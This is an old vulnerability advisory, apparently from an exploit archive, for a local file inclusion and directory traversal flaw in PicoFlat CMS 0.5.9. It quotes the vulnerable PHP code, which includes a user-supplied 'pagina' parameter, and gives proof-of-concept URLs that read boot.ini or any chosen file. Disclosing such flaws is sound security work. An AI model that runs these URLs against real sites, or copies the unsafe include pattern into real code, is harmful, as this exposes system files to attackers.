PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)

2008-05-29 00:00:00

---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda

<!-- [email protected] -->


---------------------------------------------------------------------------

bug code

<?php if (eregi('://', $pagina) || eregi('\?', $pagina)) {
$pagina = "";
include "notfound.php";
}else{
include $pagina; }
?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.